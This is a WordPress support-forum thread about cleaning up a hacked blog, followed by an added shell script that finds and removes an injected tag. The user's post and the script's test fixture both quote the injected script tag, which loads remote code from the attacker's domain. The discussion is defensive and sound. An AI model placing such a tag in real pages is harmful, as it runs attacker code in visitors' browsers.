• Hi,

    My blog was hacked recently, however using a backup I have managed to bring it back from the dead. I have since installed better security and started backing everything up much more efficiently.

    However, there is some code in the very top of all the pages that seems very suspicious…

    <script type="text/javascript" src="http://shinohei.com/enkai/nmbdptqv.php?id="></script>

    It then goes on to display the rest of the site, eg:

    <!DOCTYPE HTML><html lang="en-US" prefix="og: http://ogp.me/ns#" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#">

    Is this some left over malicious code? If so, how do I remove it?

    Thank you very much.

Viewing 4 replies - 1 through 4 (of 4 total)
  • Please follow all the steps listed here:

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    If you can SSH into the server, do a ‘grep’ command for shinohei and that will let you know all of the files that contain that code 😉

    From there, it’s as simple as deleting that string that you mentioned and saving overtop.

    Yes, that is most definitely malicious code.

    If I were reviewing I would download the site to my computer and do some file searches for that domain in the link you show above, among other searches.

    Try that download and search just to be sure you got everything. Better safe…

    Hmm, injection of such a short link prior to the rest of the legitimate site code could also be a server-level infection. In such a case, cooperation with your hosting provider will be necessary. If you’re still having the problem, please let us know here and let us know what steps you have already followed.
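
The search-and-delete steps suggested in the replies above, written out as a script. This is an added example, not code posted by anyone in the thread; the function names and the sample directory tree are constructed for illustration, and it assumes a grep that supports `-r` and `-I` (GNU or BSD).

```shell
#!/bin/sh
# Added example: locate and strip an injected <script> tag by its domain.
# Function names and the sample tree are constructed for illustration.

# Print every text file under ROOT ($1) containing INDICATOR ($2) literally.
# -F fixed string (the "." in a domain is not a wildcard), -I skip binaries.
scan_indicator() {
    grep -rIlF -- "$2" "$1" 2>/dev/null | sort
}

# Show the matching lines with numbers so they can be reviewed before editing.
show_hits() {
    grep -rInF -- "$2" "$1" 2>/dev/null
}

# Delete only the <script ...INDICATOR...></script> element from FILE ($1).
# The rest of the line (for example the <!DOCTYPE that follows) is kept.
# Run it on a downloaded copy or after taking a backup.
clean_file() {
    esc=$(printf '%s' "$2" | sed 's|[][\.*^$/]|\\&|g')
    tmp=$(mktemp)
    sed "s/<script[^>]*${esc}[^>]*><\/script>//g" "$1" > "$tmp" && cat "$tmp" > "$1"
    rm -f "$tmp"
}

# Build a small constructed site copy: one infected file, one clean file.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/wp-content/themes/demo"
    printf '%s\n' '<script type="text/javascript" src="http://shinohei.com/enkai/nmbdptqv.php?id="></script><!DOCTYPE HTML><html lang="en-US">' \
        > "$d/wp-content/themes/demo/header.php"
    printf '%s\n' '<!DOCTYPE HTML><html lang="en-US">' > "$d/index.html"
    printf '%s\n' "$d"
}

site=$(make_sample)
show_hits "$site" shinohei.com
scan_indicator "$site" shinohei.com | while IFS= read -r f; do
    clean_file "$f" shinohei.com
done
# A second scan prints nothing once every hit has been removed.
scan_indicator "$site" shinohei.com
rm -rf "$site"
```

If the file scan comes back empty while the served pages still carry the tag, that matches the server-level case raised in the last reply.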

  • The topic ‘WordPress Hacked, residule malicious code?’ is closed to new replies.